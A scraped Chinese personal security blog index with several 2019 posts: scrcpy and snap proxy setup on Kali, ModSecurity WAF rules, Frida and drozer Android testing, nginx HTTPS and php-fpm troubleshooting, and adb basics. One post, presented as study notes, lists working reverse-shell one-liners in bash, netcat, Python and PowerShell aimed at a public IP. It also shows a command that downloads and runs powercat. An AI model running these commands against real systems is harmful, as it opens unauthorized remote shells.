# 前置操作, 修改  systemctl edit 使用的编辑器为 VIM, 如果不介意 Nano 可以跳过这一步
$ sudo tee -a /etc/profile <<-'EOF' 
export SYSTEMD_EDITOR="/bin/vim"
EOF
$ source /etc/profile

# 开始设置代理
$ sudo systemctl edit snapd
加上:
[Service]
Environment="http_proxy=http://127.0.0.1:port"
Environment="https_proxy=http://127.0.0.1:port"
$ sudo systemctl daemon-reload
$ sudo systemctl restart snapd

实测相当有效

root@kali:/usr/local/scrcpy-test/scrcpy# sudo snap install scrcpy
2019-12-31T11:28:41+08:00 INFO Waiting for restart...
Download snap "core18" (1288) from channel "stable"             11% 14.7kB/s 57.7m^C^C^Z
[2]+  已停止               sudo snap install scrcpy

如上下所示,速度快了十倍~十倍的快乐~

root@kali:/usr/local/scrcpy-test/scrcpy# sudo snap install scrcpy
2019-12-31T11:36:30+08:00 INFO Waiting for restart...
Download snap "scrcpy" (199) from channel "stable"               7%  129kB/s 9m51s
Warning: /snap/bin was not found in your $PATH. If you've not restarted your session since you
         installed snapd, try doing that. Please see https://forum.snapcraft.io/t/9469 for more
         details.

scrcpy v1.12 from sisco311 installed

scrcpy投屏需要usb调试权限; 具体步骤为[开发者模式]-[打开usb调试] 否则会报错:

root@kali:~# scrcpy
INFO: scrcpy 1.12 <https://github.com/Genymobile/scrcpy>
adb: error: failed to get feature set: no devices/emulators found
ERROR: "adb push" returned with value 1

报错如下:

root@kali:/snap/bin# ./scrcpy
cannot change profile for the next exec call: No such file or directory
snap-update-ns failed with code 1: No such file or directory
查看版本:
root@kali:~# snap version
snap    2.42.5
snapd   2.42.5
series  16
kali    2019.4
kernel  5.3.0-kali3-amd64
root@kali:~# snap version
snap    2.42.5
snapd   2.42.5
series  16
kali    2019.4
kernel  5.3.0-kali3-amd64

解决:

root@kali:/var/lib/snapd/apparmor/profiles# apparmor_parser -r /var/lib/snapd/apparmor/profiles/

参考

snapInstall.md;snap安装过慢解决方案

Snap-update-ns failing, cannot launch snaps;linux重启后启动scrcpy,snap报错

[Read More]

「笔记」:反弹shell的几种方法

Dec 30, 2019. | By: Bin4xin

记录:关于bash shell的反弹:)随笔记
假定环境:

  • kali被攻击机器;ip:192.168.3.32 iZj6cgn7odv59wmjjhe6zwZ攻击机;ip:47.52.233.92

1.bash

root@kali:/# bash -i >&/dev/tcp/47.52.233.92/1234 0>& 1
root@iZj6cgn7odv59wmjjhe6zwZ:~# nc -lvvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from 223.240.212.236 37798 received!
root@kali:/# whoami 
whoami
root
root@kali:/# ifconfig    
ifconfig
eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 1c:39:47:e5:d0:0d  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 132196  bytes 121378334 (115.7 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 132196  bytes 121378334 (115.7 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.3.32  netmask 255.255.255.0  broadcast 192.168.3.255
        inet6 fe80::c895:5ca5:529a:eef3  prefixlen 64  scopeid 0x20<link>
        ether 68:07:15:d5:46:16  txqueuelen 1000  (Ethernet)
        RX packets 140963  bytes 101469044 (96.7 MiB)
        RX errors 0  dropped 15  overruns 0  frame 0
        TX packets 86373  bytes 16895892 (16.1 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

2.netcat

root@kali:/# nc -e /bin/sh 47.52.233.92 1234
root@iZj6cgn7odv59wmjjhe6zwZ:~# nc -lvvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from 223.240.212.236 37812 received!
python -c 'import pty;pty.spawn("/bin/sh")'
# whoami
whoami
root
# 

3.python

root@kali:/# python -c 'import socket,
subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("47.52.233.92",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); 
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
root@iZj6cgn7odv59wmjjhe6zwZ:~# nc -lvvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from 223.240.212.236 37820 received!
# whoami
root
# id
uid=0(root) gid=0(root) =0(root)

4.powershell构造函数反弹shell

实际反弹shell中成功的;应用场景: 1.WINDOWS系统 2.上传木马成功,但是没有交互式shell

powershell.exe -nop -c "$client = New-Object Net.Sockets.TCPClient('117.64.238.192',11223);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
powershell IEX (New-Object System.Net.Webclient).DownloadString
('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');
powercat -c 47.52.233.92 -p 11223 -e cmd

meterpreter可以直接开启

run getui -e

然后用rdesktop就能直接连了

[Read More]

「安卓渗透」:HOOK-Frida原理详解

Dec 26, 2019. | By: Bin4xin

HOOK详解

hook技术是指在android上进行的跨进程操作,包括 一、native层hook,即:jni,本地调用java native interface,称之为本层hook; 二、java本地接口 三、java层hook

  • 实际上,Android本身进行且维护着一套事件分发机制,而应用程序则包括应用触发事件后台逻辑处理

    • 壹.应用触发事件:比如app中,一个按钮对应一个url,点击则跳转默认浏览器访问url,称之为应用触发事件;

    • 贰.后台逻辑处理:我们所看不到的后台处理逻辑程序;
      比如上个栗子中:一个url按钮,我们点击后用户所看到的现象为: 按钮点击->跳转默认浏览器->浏览器地址栏填充为按钮url->访问;而对于后台来说,那么可能就没有那么简单了,当我们学会去看log日志的时候,我们会发现,后台代码程序所做的工作多得多得多。

[Read More]

Mod-Security:有关「WAF」的爱恨情仇

Dec 25, 2019. | By: Bin4xin

目录

添加于2021/02/05

“朝花夕拾”

这篇与WAF相关”技术”博客其实没有多少技术含量,只是当时刚刚接触到WAF,感觉非常的新鲜然后有了这篇博客,其实当时连LINUX基础常识都还不是非常的了解, 年少轻狂的来配置WAF肯定无法成功;现在回头来看当时的文笔还是较为稚嫩,通篇都是一些”转述”的代码块,没有自己的相关思想,是很糟糕的一篇博客。

刚好年底总结博客,总结到WAF这一块,正好把这一篇的文章给补上,整理文章可以查看,较于下面这篇文章,主要增加了自定义规则库的配置和相关验证,可通过上方目录链接直接跳转:

正好把这篇文章收个尾,我的有些文章写到一半,写不下去了就放着了。这个习惯不是很好。


记一次waf配置经历。忙里偷闲,正好有闲置的服务器,自己动动手配置看看。

1.运行环境

  • nginx-1.14.0(apt自动化安装)
  • 经过实际操作验证,这里建议各位使用nginx1.13.8版本;源码包下载链接wget http://nginx.org/download/nginx-1.13.8.tar.gz

  • ubuntu 18.04

2.安装配置

安装的过程大致是这样的一个过程:

  • 1、ModWAF编译安装
    • git clone https://github.com/SpiderLabs/ModSecurity
      
    • nginx版本,教程中推荐的1.9版本实际操作下来无法成功在UBUNTU18下编译安装,这里推荐nginx/1.13.8或者更高,极力推荐nginx/1.18.0
      • wget http://nginx.org/download/nginx-1.13.8.tar.gz
    • 环境lib库安装:
      • sudo apt-get install openssl libssl-dev libpcre3 libpcre3-dev zlib1g-dev autoconf automake libtool gcc g++ make
  • 2、编译安装NGINX
    • 注意编译安装时添加nginx连接器:
      •   git clone https://github.com/SpiderLabs/ModSecurity-nginx.git modsecurity-nginx
          ./configure --add-module=/path/to/modsecurity-nginx
        
    • NGINX WEB SERVER块配置:
      •   server {
                    
          listen 8077;
                    
          location / {
                    
              default_type text/plain;
                    
              return 200 "Thank you for requesting ${request_uri}\n";
                    
              }
                    
          }
        
    • 效果图:
      • NGINX-WAF-TEST-PAGES
  • 3、防护规则自写并测试:
    • 下载ModSecurity配置文件,我的NGINX目录在/usr/local/nginx下,所以我的命令如下;
      • cd /usr/local/nginx && mkdir modsec && cd modsec
        wget https://raw.githubusercontent.com/SpiderLabs/ModSecurity/v3/master/modsecurity.conf-recommended
        mv modsecurity.conf-recommended modsecurity.conf
        vim modsecurity.conf
        修改SecRuleEngine DetectionOnly为SecRuleEngine On
                  
        同样添加配置
        vim main.conf
        内容为
        Include /usr/local/nginx/modsec/modsecurity.conf
        SecRule ARGS:url "@contains admin" "id:2234,deny,log,status:403"
        //在访问url内传输给url这个参数中存在admin字样进行拦截,并记录。    
        
    • 报错:
      •   报错解决[emerg] "modsecurity_rules_file" directive Rules error.
          vim /etc/nginx/modsec/modsecurity.conf
          注释掉下面配置语句
          #SecUnicodeMapFile unicode.mapping 20127
        
    • 配置成功SERVER区块:
      •   server {
                  listen       8077;
                  server_name  localhost;
          	    modsecurity on;
                  modsecurity_rules_file /usr/local/nginx/modsec/main.conf;
                  #charset koi8-r;
                    
                  #access_log  logs/host.access.log  main;
                    
                  location / {
                      root   html;
                      default_type text/plain;
                      return 200 "Thank you for requesting ${request_uri}\n";
                      #index  index.html index.htm;
                      proxy_set_header Host $host;
                  }
                    
                  error_page  404 403 405              /403.html;
          	    location = /403.html {
          	        root /usr/local/nginx/html/403 ;
          	}
        
        
    • WAF防护效果图:
      • WAF-DENY-TEST

如无法测试成功可参考以下链接:

《手把手带你搭建企业级WEB防火墙ModSecurity3.0+Nginx》

《ModSecurity:一款优秀的开源WAF》

添加于2021/02/05

3.规则库配置

我们从上面得到:

  • main.conf配置文件自写规则库:
    • 测试:
      •   Include /usr/local/nginx/modsec/modsecurity.conf
          SecRule ARGS:url "@contains admin" "id:2234,deny,log,status:403"
          //在访问url内传输给url这个参数中存在admin字样进行拦截,并记录。
        
    • 当然也可以发散思维,禁止参数传入/etc/passwd等,此处权当抛砖引玉

我们在安全开发的过程中若需要自写规则库进行WEB防御,可参考:

自写规则库定义一览      
REQUEST_LINE 代表整个请求行 SecRule REQUEST_LINE "!(^((?:(?:POS|GE)T|HEAD))|HTTP/(0\.9|1\.0|1\.1)$)" "phase:1,id:49,log,block,t:none" #该规则表示,仅允许请求方式为POST,GET以及HEAD,同时请求协议也仅允许为HTTP0.9/1.0/1.1
REQUEST_METHOD 代表请求方式 SecRule REQUEST_METHOD "^(?:PUT|CONNECT|TRACE|DELETE)$" "phase:1,id:49,log,block,t:none" #该规则表示,如果请求方式是PUT、CONNECT、TRACE、DELETE的任意一种方式,则拦截此次访问
REQUEST_PROTOCOL 代表请求协议&版本 SecRule REQUEST_PROTOCOL "!^HTTP/(0\.9|1\.0|1\.1)$" "phase:1,id:50,log,block,t:none" #该规则表示,如果访问协议不是HTTP,同时协议版本也不是0.9/1.0/1.1的话,拦截此次访问
REQUEST_URI 代表包含查询字符串数据在内的完整请求URL SecRule REQUEST_URI "attack" "phase:1,id:52,t:none,t:urlDecode,t:lowercase,t:normalizePath" #该规则表示,如果请求URL中包含attack字符串,则拦截此次访问
REQUEST_FILENAME 代表不包含查询字符串数据在内的相对请求URL SecRule REQUEST_FILENAME "/etc/passwd" "phase:1,id:53,log,block,t:none" #该规则表示,如果请求URL(不含传入参数)包含etc/passwd字符串,则拦截此次访问
REQUEST_HEADERS 代表所有请求头的集合,也可以用于检查所指定的请求头内容(通过使用REQUEST_HEADERS:Header-Name语法) SecRule REQUEST_HEADERS:Host "^[\d\.]+$" "deny,id:47,log,status:403" #该规则表示,如果请求头中的HOST字段的内容为IP地址的话,则使用deny动作拒绝此次访问,同时向客户端返回403错误

效果图: WAF-PASSWD-DENY

参考:

ModSecurity中文手册

4.总结

原文大量篇幅写的是代码的配置问题,后期修改后删除了大部分,有兴趣的可以看上面的第二个链接;

这一块,其实跟着原教程走了一个弯,这里原作者在教程中应用的是反向代理,我们可以通过以上成功的SERVER配置块了解到其实直接链接WAF让规则库生效即可。


以上。

[Read More]

一、drozer运行概述

跟Frida-Hook框架运行模式差不多,均为C/S模式。

  • 1)移动端:drozer-agent启动pc-drozer框架前需打开drozer-agent进行端口转发
  • 2)pc端:主要控制CLI端。渗透测试命令全部在这里输入执行;

1.1 drozer环境

  • windows/linux-debian
  • python2.7
  • drozer&drozer-angent

1.2 前期准备

windows-drozer-2.4.4.msi下载
debian-linux-drozer-2.4.4.deb下载
android-drozer-2.3.4.apk下载

多提一句:
msi后缀为windows可执行文件,双击安装即可。
deb:dpkg -i <deb包>
apk是安卓包,下载到本地<adb install apk包>

二、drozer实战

C:\Users\本阿信>drozer console connect
Selecting 7ad839637216ad27 (OPPO OPPO R11 Plus 5.1.1)

            ..                    ..:.
           ..o..                  .r..
            ..a..  . ....... .  ..nd
              ro..idsnemesisand..pr
              .otectorandroidsneme.
           .,sisandprotectorandroids+.
         ..nemesisandprotectorandroidsn:.
        .emesisandprotectorandroidsnemes..
      ..isandp,..,rotectorandro,..,idsnem.
      .isisandp..rotectorandroid..snemisis.
      ,andprotectorandroidsnemisisandprotec.
     .torandroidsnemesisandprotectorandroid.
     .snemisisandprotectorandroidsnemesisan:
     .dprotectorandroidsnemesisandprotector.

drozer Console (v2.4.4)
dz>

updating~

[Read More]

  • 忙里偷闲,本文是记录Hook-Frida框架,如何使用Frida注入代码,做到对安卓apk进行代码hook注入。

Frida框架准备

1.frida框架安装
frida框架为C/S模式,即客户端、服务端模式:

  • 1)一部分是运行在客户端上的命令行交互工具:Frida CLI。
  • 2)另一部分是运行在目标机器(服务端,在本文中则是安卓手机)上的代码注入:frida-server。
    过程为:你在电脑上进行frida控制,开启目标机器(服务端)上的server端后,我们可以一些自定义操作比如指定hook脚本,这些参数通过客户端发送到服务端,服务端接收参数后来进行操作

2.一个测试apk

3.hook代码(此处hook代码不便贴出,见谅)

安装Frida

这里Frida支持python3和python2.7,因为确实3和2.7之间还是有不同的地方,本文以python2.7安装Frida为例:
查看pip版本

pip --version
pip 18.1 from /usr/lib/python2.7/dist-packages/pip (python 2.7)
##你想在哪个环境下运行Frida,就用哪个命令(pip、pip3)
pip3 --version
pip 18.1 from /usr/lib/python3/dist-packages/pip (python 3.7)

确认是在2.7版本环境下安装即可:

pip install frida
Collecting frida
    Downloading https://files.pythonhosted.org/packages/38/1b/8a462787cedda36c57227ed0babbd80c4c4cc5bc9c1f9b5aa285ed6aebba/frida-12.8.0.tar.gz
Building wheels for collected packages: frida
  Running setup.py bdist_wheel for frida ... \
  Successfully built frida
Installing collected packages: frida
Successfully installed frida-12.8.0

安装完frida,继续安装依赖项:frida-tools:

pip install frida-tools
	100% |████████████████████████████████| 348k

此处基本frida框架就安装完成了,查看一下frida的版本号

frida --version
12.8.0

安装frida-server

此处安装的是Frida的服务端,在手机端运行。手机端大多为ARM架构,但有的小伙伴使用的模拟器,所以先用命令查看一下手机的cpu架构:

adb shell
* daemon not running; starting now at tcp:5037
* daemon started successfully
shell@angler:/ $ su
root@angler:/ # getprop ro.product.cpu.abi
arm64-v8a

如果回显是arm就下载arm版本,回显x86就下载x86版本。 frida-server下载
这里记住千万不要下载错了,进去页面直接CTRL+F搜索server。下载完毕,重命名为frida-server
把frida-server传输到手机,(注意:pc端frida版本号与移动端一致):

##PC端
adb devices
adb push frida-server /data/local/tmp
adb forward tcp:27042 tcp:27042
adb forward tcp:27043 tcp:27043
##移动端
adb shell
root@angler:/data/local/tmp # cd /data/local/tmp/ 
root@angler:/data/local/tmp #./frida-server

Frida-Hook实战

在启动服务端frida-server后,在客户端进行操作:

##指定好pack包和js文件路径
frida -U -f <package-name> -l <hook.js-path>
##提示<package-name>Spawned成功后,输入%resume重启app后使app-hook注入


如下图,app重启后检测到hook框架代码弹出提示,此时js代码注入成功。

以上为敬。

参考文档: Frida详细安装教程

[Read More]

「笔记」NGINX:http升级https协议

Dec 7, 2019. | By: Bin4xin

窈窕HTTPS,正是TCP的好逑;

how to used http to https with nginx?is’s sounds fantastic!

其实证书早就颁发下来了,一直配置配不成功(小声bb)。纪念一下,2019-12-13号,chihou.pro升级为https协议。嘿嘿

1.安装libssl库

sudo apt-get install libssl-dev
apt-get install libpcre3 libpcre3-dev

2.ssl编译

cd nginx/ 
./configure --prefix=/usr/local/nginx --with-http_stub_status_module --with-http_ssl_module --with-file-aio --with-http_realip_module
make 
如果安装了nginx,到这里结束。
反之再加
make install
cd #你解压nginx的目录/sbin/
./nginx -V
nginx -V #注意是大v,看到下面有--with-http_ssl_module模块即可
nginx version: nginx/1.16.1
built with OpenSSL 1.1.1d  10 Sep 2019
TLS SNI support enabled
configure arguments: --with-cc-opt='-g -O2 --with-http_ssl_module 
cp nginx /usr/sbin
复制到快速启动目录即可

3.认证配置

证书申请下来后把证书传到服务器上就行了,配置nginx的https区块即可。

http{
server {
    listen 443;
    server_name XXX;
    ssl on;
    ssl_certificate    /usr/local/nginx/conf/cert/214.pem;#你自己的证书地址
    ssl_certificate_key   /usr/local/nginx/conf/cert/21.key;
    ssl_session_timeout 5m;
    ssl_ciphers ECDHE-RSA-AES128-GCM-SHA256:ECDHE:ECDH:AES:HIGH:!NULL:!aNULL:!MD5:!ADH:!RC4;
    ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
    ssl_prefer_server_ciphers on;    
    
    location / { 
        
	    }      
	}
}

nginx -t 
systemctl reload nginx

AMAZING:it’s failed

配置完美滋滋去验证网站,畏(zhi)畏(gao)缩(qi)缩(ang)的输入https://www.chihou.pro,结果傻了眼,还是http的协议提示,好气。

赶紧趁着ssh还没断开赶紧查看配置哪里出了问题。 思路:因为配置了ssl,监听了443端口。所以服务器肯定在监听了443端口,先查查看:

netstatus -tunlp |grep 443#发现没有回显,那看看所有监听服务器
netstatus -tunlp#(仅仅展示一部分)发现服务器并未监听443
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      861/nginx: master p 
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      319/systemd-resolve 
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      6029/sshd           

如上代码,nginx配置了监听443,,实际上linux却没有监听,问题肯定就出在这上面
首先排除:nginx配置问题,因为nginx配置是能够通过的,所以暂时排除。
第二就是防火墙的问题,先登上控制台确认443端口开放,没问题。然后登上服务器查看服务器防火墙状态,因为是ubuntu服务器所有查看ufw状态:

systemctl status ufw
● ufw.service - Uncomplicated firewall
   Loaded: loaded (/lib/systemd/system/ufw.service; enabled; vendor preset: enabled)
   Active: active (exited) since Fri 2019-12-13 10:46:00 CST; 1h 54min ago
     Docs: man:ufw(8)
  Process: 31826 ExecStop=/lib/ufw/ufw-init stop (code=exited, status=0/SUCCESS)
  Process: 31967 ExecStart=/lib/ufw/ufw-init start quiet (code=exited, status=0/SUCCESS)
 Main PID: 31967 (code=exited, status=0/SUCCESS)

Dec 13 10:46:00 iZj6cgn7odv59wmjjhe6zwZ systemd[1]: Starting Uncomplicated firewall...
Dec 13 10:46:00 iZj6cgn7odv59wmjjhe6zwZ systemd[1]: Started Uncomplicated firewall.

看到服务器防火墙是active状态,但是接下来却让我目瞪口呆

ufw status verbose
Status: inactive
ufw status numbered
Status: inactive

不管怎么写命令,他都是提示incative,我瞬间就崩溃了,我甚至还尝试了systemctl status verbose ufw这样的蠢命令- -||| 后来各种查命令,因为我坚信服务器上还有第二个防火墙~
理由:控制台开放了443,而我进行验证却验证失败: telnegt $IP 443反馈:telnet: Unable to connect to remote host: Connection refused,所以我就一直钻到防火墙的牛角尖出不来了。 兜兜转转,圈圈圆圆。所以就一直拖到了今天TAT

It can be solved.

后来证实其实问题不是在防火墙上,今天偶然网上冲浪,看到个帖子:

(建议右键新建页面打开~笔芯),引用文章的话:

如果无法连接,通常是防火墙,或者nginx为(未)(我真是个天才)启动等可能的因素;
冷静分析问题,查看错误信息,才是解决问题的办法

联想到我的问题,难道?是nginx根本没有重启?一语惊醒梦中人。赶紧登上服务器。 既然systemctl没用,那直接用nginx配置命令

nginx -s reload

输入chihou.pro-键入F5
她居然跳转了https页面,我哭了。

冷静分析问题,查看错误信息,才是解决问题的办法
解决问题的办法
办法
奥利给~
给...

如果这篇文章帮助到了您,那不如在心里大大喊一声nice
敬上。感谢您的阅读
参考:
启动Nginx出现Failed to start nginx.service:unit not found
Ubuntu编译安装nginx
nginx 动态添加ssl模块

[Read More]

「排错」:php-fpm解析404-not found

Dec 4, 2019. | By: Bin4xin

  • php+nginx解析错误,报错404-Not Found

前言

容器内是自己写的个人博客,处于安全考虑用的是静态页面博客。但是由于公网维护博客较为困难,加上之前用的开源存储云服务项目,那么就需要php来解析,所以打算试一试能不能「nginx+php」的方式方便个人维护博客。
所以本菜最终想完成的是这样的:

  • static html:web blog + dynamic php:store server
  • 静态博客页面 + 动态php页面传输markdown文件

报错现象

nginx容器能够启动,HTML页面能够正常回显,但是解析php页面会报错:404-NOT-FOUND;

vi index.php
<?php
phpinfo();
?>

看到比我头还大的404头就疼;确定各种php的配置都没错。

server {
location ~ \.php{
	    index  indx.php index.html;
	    include snippets/fastcgi-php.conf;
	    fastcgi_pass unix:/var/run/php/php7.2-fpm.sock;
		}
}

就各种上网搜php-404,问人。都没答案。

排错过程

幡然悔悟

正好最近薅了一个华为云服务器,反手就是nginx+php存储项目往上安装方便传输文件,配nginx的时候看到这么一行配置:

##
# Virtual Host Configs
##
	include /etc/nginx/conf.d/*.conf;
	include /etc/nginx/sites-enabled/*;

直拍大腿,当初配博客服务器的时候,嫌麻烦,直接把/etc/nginx/sites-enabled/这行配置注释掉了,自己在http区块配了php-location-server。赶紧重新配置php-fpm:

传送门:「移植」ubuntu with arm.公网存储容器搭建记录 http://www.chihou.pro/2019/11/10/Ubuntu-linux-with-arm/

茅塞顿开

重新软链接完php-fpm,迫不及待访问php文件,又报错:

502:Bad-Gateway

舒了一口气,总算不是该死的404了。502报错基本上就是php-fpm的配置问题了,一般都是fpm在解析时出错。反手查看一波php运行日志:

cat /var/log/php7.2-fpm.log
[04-Dec-2019 17:58:14] NOTICE: ready to handle connections
[04-Dec-2019 17:58:14] NOTICE: systemd monitor interval set to 10000ms

果然,php-fpm解析超时了导致报错,直接搜索解决答案;

迎刃而解

在php-fpm配置文件下加入fpm运行参数:

vi /etc/php/7.2/fpm/php-fpm.conf
;;;;;;;;;;;;;;;;;;
; Global Options ;
;;;;;;;;;;;;;;;;;;
pm.max_children = 50
pm.start_servers = 15
pm.min_spare_servers = 10
pm.max_spare_servers = 40 
systemctl reload php-fpm

同时对nginx增加配置:

vi /etc/nginx/nginx.conf
http {

fastcgi_connect_timeout 300;
fastcgi_send_timeout 300;
fastcgi_read_timeout 300;

} 
nginx -t
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful
测试无误

访问index.php,终于看到了熟悉的phpinfo页面,至此排错、配置结束。


2020-02-20更新:

在linux下配置好nginx和php-fpm后,访问web页面不能显示,查看nginx访问日志,日志显示返回200,访问成功。 html静态页面没问题,但是php页面总是空白页也没有任何报错,经过查找,发现需要在nginx中加入一句话

fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;

安装完nginx后默认的fastcgi_params配置文件中没有上面这句话。

在nginx.conf中的

location ~ .php$ {
root html;
fastcgi_pass 127.0.0.1:9000;
fastcgi_index index.php;
#fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
include fastcgi_params;
}

或者在fastcgi_params配置文件中加入

# PHP only, required if PHP was built with –enable-force-cgi-redirect
fastcgi_param REDIRECT_STATUS 200;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;

然后重启nginx就可以显示出页面了。

nginx下运行php文件时返回200访问空白页: https://blog.csdn.net/xkweiguang/article/details/52795166


502badgateway:

apt自动化安装:

配置/etc/php/7.3/fpm/pool.d/www.conf文件:
php-fpm.conf: listen = 127.0.0.1:9000
nginx.conf: fastcgi_pass 127.0.0.1:9000;

php 502 bad gateway 解决方法: https://blog.csdn.net/ucmir183/article/details/80240112

以上。

= =|||

[Read More]

「安卓渗透」:总览

Nov 30, 2019. | By: Bin4xin

  • 摘要:最近在学安卓渗透,遂记录下相关知识点和一些没有弄明白的知识点。持续更新updating~

前言

接触了一些安卓渗透的项目,根据不同安全公司内部的要求,规定对于安卓渗透技术的基本原则、工作方式;且使用不同的、对外的商业渗透测试。 综述包括如下:
1.代码、程序安全;
2.验证码机制安全;
3.越权检测;
4.服务器WEB漏洞。

一、代码/程序安全

1.源码反编译,保证源码安全,保证源码不被反编译。

防止不法分子阅读源码,了解运行逻辑。

2.代码混淆安全,对程序代码进行混淆加密

防止不法分子读懂源码。

3.二次打包安全

防止不发分子对安装包进行篡改操作。

		|_主要onCreate操作类,弹窗代码:
				AlertDialog.Builder builder  = new Builder(MainActivity.this);
				builder.setTitle("test alert" ) ;
				builder.setMessage("test by bin4xin" ) ;
				builder.setPositiveButton("yes" ,  null );
				builder.show(); 
		|_在关键位置插入toast提示代码:
				btnToast1.setOnClickListener(new View.OnClickListener() {            
             @Override
             public void onClick(View v) {
                 // TODO Auto-generated method stub
                 Toast toast=Toast.makeText(MainActivity.this,"Toast Message",Toast.LENGTH_SHORT    );
                 toast.setGravity(Gravity.CENTER, 0, 0);
                 toast.show();
             	}
        		});
		|_在关键位置插入关键调试日志输出:
				public static int d(String tsg,String msg)
				Log.d("DEBUG", "This is a debug");
		|_分析smali/so代码的具体校验位置,是否能修改绕过防护;
		|_分析正版合法型数据的绕过。

4.签名校验安全

防止不法分子篡改源码、二次打包后传播安装包。

5.so文件安全?

so库和import库的区别,so文件可以理解成一个安装包的反汇编文件?)

6.H5代码安全?

(H5代码在安卓工程中的作用是否为静态代码、用于展示等)

7.APK升级机制

防止升级apk为不法分子的二次打包的apk。

二、调试安全

8.debug属性安全

防止发行版apk可以调试

	|_AndroidManifest.xml->[-]删除debuggable属性或设置为false;

[Read More]

「安卓渗透」:天之骄子ADB

Nov 30, 2019. | By: Bin4xin

adb简介

adb(Android Debug Bridge)Android调试桥是一种功能多样的命令行工具,可让设备之间(PC端和移动端)进行通信。 adb 命令便于执行各种设备操作(例如安装和调试应用),并提供对 Unix Shell(可用来在设备上运行各种命令)的访问权限。 它是一种客户端-服务器程序。

一、adb连接

本菜使用的是模拟器,不同模拟器端口不一样。比如谷歌模拟器端口则默认为5555;

$ adb connect 127.0.0.1:21503
adb server is out of date.  killing...
* daemon started successfully *
connected to 127.0.0.1:21503
$ adb devices
List of devices attached
127.0.0.1:21503 device

二、adb常使用命令

Linux下的命令就不多说了;直接看adb的常用命令(在pc端控制台查看、使用) Android Debug Bridge version 1.0.32 device commands:

1.adb push

顾名思义,push,推送:

在pc端控制台将pc端的文件(夹)push到移动端,用法实例:
$ adb push inject /data/local
1606 KB/s (17936 bytes in 0.010s)
进入安卓手机验证:
root@SM-G9350:/data/local # ls
gdb
inject
tmp

如上所示inject文件被push到安卓机中。

2.adb pull

与push相反

在pc端控制台将移动端的文件(夹)pull到pc端。
$ adb pull /data/local/inject C:\Users\本阿信
2507 KB/s (17936 bytes in 0.006s)
在pull文件夹控制台验证:
$ dir
 驱动器 C 中的卷是 root
 卷的序列号是 0009-A6D5
 C:\Users\本阿信 的目录(此下DIR为尖括号,会将文本格式闭合,所以换成括号)
2019/11/30  22:25    (DIR)          .
2019/11/30  22:25    (DIR)         ..
2019/11/28  17:15    (DIR)         .android
2019/11/28  17:44    (DIR)         .idlerc
2019/11/30  22:03    (DIR)         .MemuHyperv
2019/10/16  22:05    (DIR)         .ssh
2019/11/30  22:25            17,936 inject

如上所示inject文件已经被pull到pc端了。

3.adb shell

打开进入已连接安卓机的shell; adb提示已经连接上了安卓手机,直接进入系统。

$ adb shell
root@SM-G9350:/ # whoami
root
root@SM-G9350:/ # pwd
/
root@SM-G9350:/ # uname -a
Linux localhost 4.0.9 #661 SMP PREEMPT Mon Nov 4 13:15:47 CST 2019 i686 GNU/Linux

可以发现有熟悉的Linux系统的影子~

4.adb shell

后缀加入command,不同于3 run remote shell command 远程运行shell命令。控制台不进入Andriod Shell;

$ adb shell uname -a
Linux localhost 4.0.9 #661 SMP PREEMPT Mon Nov 4 13:15:47 CST 2019 i686 GNU/Linux
如上,控制台回显信息,但此时还是在pc端控制台,并没有进入安卓控制台。

5.adb logcat

[] - View device log 查看设备日志:

查看所有日志:
$ adb logcat
--------- beginning of main
I/Netd    (    0): Netd 1.0 starting
E/Netd    (    0): Failed to open /proc/sys/net/ipv6/conf/default/accept_ra_rt_table: No such file or directory
E/Netd    (    0): Failed to open /proc/sys/net/ipv6/conf/eth0/accept_ra_rt_table: No such file or directory
E/Netd    (    0): Failed to open /proc/sys/net/ipv6/conf/ifb0/accept_ra_rt_table: No such file or directory
E/Netd    (    0): Failed to open /proc/sys/net/ipv6/conf/ifb1/accept_ra_rt_table: No such file or directory
E/Netd    (    0): Failed to open /proc/sys/net/ipv6/conf/lo/accept_ra_rt_table: No such file or directory
E/Netd    (    0): Failed to open /proc/sys/net/ipv6/conf/sit0/accept_ra_rt_table: No such file or directory
I/installd(    0): installd firing up
I/        (    0): debuggerd: Apr  4 2019 17:10:30

过滤日志:

$ adb logcat E/WifiStateMachine
